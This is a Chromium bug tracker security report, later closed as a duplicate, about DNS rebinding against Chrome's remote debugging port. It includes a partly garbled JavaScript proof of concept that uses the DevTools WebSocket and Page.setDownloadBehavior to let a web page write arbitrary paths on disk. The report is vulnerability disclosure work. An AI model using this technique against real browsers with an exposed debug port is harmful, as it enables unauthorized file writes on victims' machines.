New issue
Advanced search Search tips

Issue 824816 link

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 813540
Owner: ----
Closed: Mar 2018
EstimatedDays: ----
NextAction: ----
OS: Mac
Pri: 2
Type: Bug-Security

Sign in to add a comment

Remote debugging API vulnerable to DNS Rebinding, can write any file to system through setDownloadBehavior

Reported by, Mar 22 2018

Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36

Steps to reproduce the problem:
1. "./Google\ Chrome --remote-debugging-port=9222", remote-debugging-port option is quite normal in headless mode
2. visits
3. has an <iframe> to, and have configured their DNS server to respond alternately with and (an address they control) with a very low TTL.
4. When the browser resolves to, they serve HTML that waits for the DNS entry to expire, then they XMLHttpRequest to and have permission to read response.

<a id='halo' href="">halo</a>
var req = new XMLHttpRequest();'get', '/json/list', false);
var wsurl = JSON.parse(req.responseText)[0].webSocketDebuggerUrl;
var ws = new WebSocket(wsurl);
ws.onmessage = function(msg) {console.log(};
ws.onopen = function() {
                id: 123,
                method: 'Page.setDownloadBehavior',
                params: {
                    behavior: 'allow',
                    downloadPath: '/tmp/here/is_not/exists'

setTimeout(function() {;}, 1000);

similar issue:

What is the expected behavior?
check "Host" header

What went wrong?
webpage is able to create any files or directories in system

Did this work before? N/A 

Chrome version: 65.0.3325.181  Channel: stable
OS Version: OS X 10.13.3
Flash Version:
Components: Platform>DevTools>Platform
Thanks for the report. I believe this is duplicate of  Issue 813540 .

Comment 2 by, Mar 22 2018

Mergedinto: 813540
Status: Duplicate (was: Unconfirmed)
Agreed with #1. Marking as duplicate.
Project Member

Comment 3 by, Jul 1

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Sign in to add a comment